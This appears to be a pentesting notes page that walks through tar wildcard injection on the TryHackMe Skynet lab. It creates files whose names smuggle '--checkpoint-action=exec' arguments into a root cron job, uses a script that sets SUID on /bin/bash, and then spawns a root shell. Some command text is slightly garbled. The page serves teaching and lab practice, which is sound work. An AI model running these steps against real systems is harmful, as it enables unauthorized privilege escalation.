Wildcard Injection Using tar

An attacker can use crafted filenames to inject arguments to commands that are run by other users like root.

Wildcard Injection Example

We created two files with the name file1 and--help, both have content “this_is_file1” and “this_is_file2” respectively. But when we cat --help we get the help menu of the cat command rather than the original content. Yeah, this is weird and this is something that we are going to do but with tar.

Tar is a software utility that is used to create and extract archive files.

For demonstration purposes, we are taking a room from TryHackMe named Skynet.

We already have a netcat shell and we are www-data which is a non-root user. Look at crontab jobs

Use the below command to see all cronjobs.

Command: cat /etc/crontab

As we can see there is an interesting job /home/milesdyson/backups/backup.sh that runs backup.sh file every minute with root privileges.

Moving into /home/milesdyson/backups, we can see the backup.sh file contains some script. This script changes the directory to /var/www/html and creates an archive of all the files in /home/milesdyson/backupsusing tar and saves it with the name backup.tgz.

The wildcard is used to compress multiple files at once. We can use this to inject arguments of our choosing which tar will execute just like that example we saw above. Exploit Wildcard

Move to/var/www/html and create some files(these files are actually tar arguments) using the below commands:

echo '#/!bin/bash\nchmod +s /bin/bash' > shell.sh
                      or 
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/shell.sh    
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

In the backend, the whole thing is interpreted as:

tar cf /home/milesdyson/backups/backup.tgz --checkpoint=1 --checkpoint=action=exec=sh shell.sh

— checkpoint[=NUMBER] - Use “checkpoints”: display a progress message every NUMBER records (default 10).

— checkpoint-action=ACTION: Execute ACTION at every checkpoint, in our case exec.

exec=command: Execute the given command.

The shell.sh contains a bash shell with a command that sets SUID bit to /bin/bash. The second command executes the shell.sh. So when the cronjob will execute the next minute, it will take those files as arguments/flags rather than a normal file name and set /bin/bash with setuid permission.

We can see that /bin/bash now has a SUID bit set means we can execute it with root privileges and get the root shell.

Now run the below command to get the root shell.

Command: /bin/bash -p

PreviousCrontab Nextrbash shell escape

Last updated 1 year ago